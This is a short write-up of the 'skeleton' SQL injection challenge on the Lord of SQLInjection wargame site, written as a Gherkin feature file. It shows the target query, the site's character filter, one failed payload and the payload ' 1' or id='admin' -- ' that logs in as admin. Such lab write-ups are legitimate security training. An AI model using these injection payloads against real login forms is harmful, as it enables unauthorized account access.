## Version 2.0
## language: en

Feature: skeleton-sql-injection-lordofsqli
  Site:
    LORD OF SQLINJECTION
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
    | <Software name> | <Version>           |
    | NixOS           | 19.09.2260          |
    | Chromium        | 78.0.3904.87        |
  Machine information:
    Given the challenge URL
    """
      https://los.rubiya.kr/chall/skeleton_a857a5ab24431d6fb4a00577dac0f39c.php
    """
    When I open the URL with Chrome
    Then I see the PHP code that validates the user id
    And It shows the query made on the screen
    """
      select id from prob_skeleton where id='guest' and pw='' and 1=0
    """

  Scenario: Fail:Sql-injection
    Given the PHP code
    And knowing that answer is correct when It returns:
    """
      SKELETON Clear!
    """
    When I try with the well known payload:
    """
      pw=' or 1=1--
    """
    Then I get nothing
    But I don't solve it

  Scenario: Success:Sqli-comment-technique
    Given I inspect the code
    And I see that they validate certain characters
    """
      if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
    """
    When I use the following request
    """
      ?pw=1' or id='admin' --
    """
    Then I solve the challenge
